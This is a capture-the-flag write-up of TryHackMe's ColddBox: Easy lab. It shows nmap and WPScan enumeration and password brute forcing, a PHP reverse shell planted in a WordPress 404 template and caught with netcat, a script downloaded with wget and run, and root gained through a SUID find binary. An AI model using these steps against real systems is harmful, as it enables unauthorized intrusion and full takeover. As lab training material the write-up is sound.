ColddBox: Easy - TryHackME

 

This is the write-up for TryHackMe's room named ColddBox: Easy

Rooms's URL : https://tryhackme.com/room/colddboxeasy

Its is an easy boot2root box and task is to get user and root flag

Enumeration:

# Identify the list of services running on the target machine

sudo nmap -sS -Pn -T4 -p- 10.10.128.156

# Perform further information gathering on the open ports identified above

sudo nmap -O -A -Pn -T4 -p80,4512 10.10.128.156

So we have a WordPress site and SSH running on a non standard port.

WordPress Enumeration

Browse the website

And find the WordPress login Portal at : http://10.10.128.156/wp-login.php

Next step is to run WPScan to enumerate plugins and users and check if user's passwords can be brute forced:

wpscan --url http://10.10.128.156 --enumerate ap,u

[+] XML-RPC seems to be enabled: http://10.10.128.156/xmlrpc.php ==> This indicates that user's passwords can be brute forced.

Put the above users in a file named user.txt and lets brute force the password:

wpscan --url http://10.10.128.156/ -U user.txt -P /usr/share/wordlists/rockyou.txt -vv

Success for users c0ldd password. Use them to login to the website.

Initial Foothold

Edit the 404 Template from Appearance->Editor->Templates->404.php and put in a PHP reverse shell from pentest monkey's website and put in the IP Address of you attacking machine with a port on which you want to get a reverse shell, in this case 9999 and then do Update File to update the file.

Now start a netcat session on the attacking machine

nc -nlvp 9999

and browse the newly edited 404.php from the browser to get a reverse shell:

http://10.10.128.156/wp-content/themes/twentyfifteen/404.php

Upgrade to a stable shell using the following commands:

/usr/bin/script -qc /bin/bash /dev/null

control+z to background

stty raw -echo

fg

export TERM=xterm

Privilege Escalation - Method 1

Lets run Linux Smart Enumeration Script on the target to see if we can find something that can help us in the escalation our privileges by running the following commands:

From attacking machine from the directory where we have lse.sh script:

python -m http.server 8000

On Target Machine:

cd /tmp

wget http://10.8.98.192:8000/lse.sh
chmod +x lse.sh

./lse.sh -l 1

Lets check if we can find something interesting from the output of lse.sh script:

So the find binary has got a SUID bit set. Lets check https://gtfobins.github.io/gtfobins/find/ to see if that can be used to do privilege escalation:

Sure enough we can. Lets run the following command:

/usr/bin/find . -exec /bin/sh -p \; -quit

Our effective uid is 0 meaning we are ROOT now !

Lets collect our flags:

Privilege Escalation - Method 2

From our reverse shell, we can read the wp-config.php file:

Tried using these credentials to login to mysql database, but user c0ldd has not got the permissions to access database, so lets try to login via SSH @port 4512 re-using user's c0ldd password from above

ssh c0ldd@10.10.128.156 -p 4512

Get the user's flag from /home/c0ldd/user.txt

C0ldd is a member of lxd group. This can be easily abused to get root.

Check my post to do this privilege escalation:

https://basicpentesting.blogspot.com/2020/12/for-business-reasons-without-metasploit.html

That's it. Thanks for reading and take care. See you next time.